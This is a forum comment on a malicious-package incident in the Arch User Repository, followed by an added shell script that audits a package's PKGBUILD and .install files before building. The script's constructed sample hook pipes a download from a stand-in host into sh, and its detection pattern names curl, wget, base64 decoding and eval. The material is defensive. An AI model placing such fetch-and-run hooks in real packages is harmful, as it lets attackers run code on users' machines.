As I understand it, the attack vector went after orphaned packages primarily. Several of the affected packages would only run the malicious code if it was a fresh install, not just an update. So it would have had to be a clean install of an affected package or a newly installed dependency called to invoke this during the approximately 2 day window.
Yes, this is bad, but it’s clearly testing for weaknesses in the chain through AUR.
Yes, I know it’s contributed code by the community and a random actor can cause havoc. Yes, I know how to manually build packages and check for changes. Yes, I am guilty of using helpers. No, I wouldn’t catch everything on my own.
I do limit what I do use from the AUR, because those installs and updates require more scrutiny.
I am reassessing my own threat model as there are a couple of packages where I’m dependent on the AUR - most notably displaylink drivers.
I do wish communication was better around the event. I found out first through being subscribed to the mailing list. An announcement on the main page would have gone a long way.
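The comment above mentions two things worth seeing concretely: that pacman's .install hooks split into post_install (fresh install only) and post_upgrade (updates only), and that the alternative to blindly trusting a helper is to read the PKGBUILD and .install before building. The script below is an added example, not code from the commenter, from Arch, or from the AUR; the function names are mine, and it runs on a constructed sample package written to a temp directory so it works offline.

```shell
#!/usr/bin/env bash
# Added example: a small pre-build audit for the files an AUR package ships.
# Runs on a constructed sample package (below), not a real one.

# List the pacman hook functions an .install file defines. pacman runs
# post_install only on a fresh install and post_upgrade only on an update,
# so a payload placed solely in post_install never fires for users who
# already had the package and merely updated it.
list_install_hooks() {
    grep -oE '^(pre|post)_(install|upgrade|remove) *\(\)' "$1" | tr -d '() ' | sort -u
}

# Every host referenced by URL anywhere in the package files. Anything that
# is not the upstream project (the url= line) deserves a look before
# makepkg runs.
referenced_hosts() {
    grep -ohE 'https?://[^/"'"'"' )]+' "$@" | sed -E 's#https?://##' | sort -u
}

# Constructs that should not appear in a PKGBUILD or install hook without a
# very good reason: fetching and executing remote content, decoding embedded
# blobs, eval. Prints file:line:text for each hit; returns 1 if anything hit.
flag_suspicious() {
    grep -nHE 'curl|wget|base64 +-d|base64 +--decode|eval |\| *(ba)?sh( |$)|\bsh -c' "$@" \
        && return 1
    return 0
}

# Run all three checks over a package directory before building it.
audit_pkg() {
    local dir=$1 f
    echo "== install hooks"
    for f in "$dir"/*.install; do [ -e "$f" ] && list_install_hooks "$f"; done
    echo "== referenced hosts"
    referenced_hosts "$dir"/PKGBUILD "$dir"/*.install
    echo "== suspicious constructs (empty is good)"
    flag_suspicious "$dir"/PKGBUILD "$dir"/*.install
}

# Constructed sample package: a clean PKGBUILD plus an .install whose
# post_install pulls and runs a remote script, while post_upgrade is benign.
SAMPLE_DIR=$(mktemp -d)
cat > "$SAMPLE_DIR/PKGBUILD" <<'EOF'
# Constructed sample, not a real AUR package
pkgname=example-tool
pkgver=1.2.0
pkgrel=1
url="https://example.org/example-tool"
install=example-tool.install
source=("https://example.org/releases/example-tool-$pkgver.tar.gz")
sha256sums=('SKIP')
package() { install -Dm755 example-tool "$pkgdir/usr/bin/example-tool"; }
EOF
cat > "$SAMPLE_DIR/example-tool.install" <<'EOF'
post_install() {
    # Constructed sample: runs only on a fresh install, never on an update
    curl -s https://paste.example.invalid/x | sh
}
post_upgrade() {
    echo "upgraded"
}
EOF

audit_pkg "$SAMPLE_DIR" || echo ">> hits found: read the files before running makepkg"
```

On a real package the directory would come from `git clone https://aur.archlinux.org/<pkgname>.git`; for an update, `git diff HEAD~1 -- PKGBUILD '*.install'` in that clone shows exactly what changed since the version you last built, which is the check most helpers skip on your behalf. The pattern list is deliberately crude: it is a prompt to read, not a verdict.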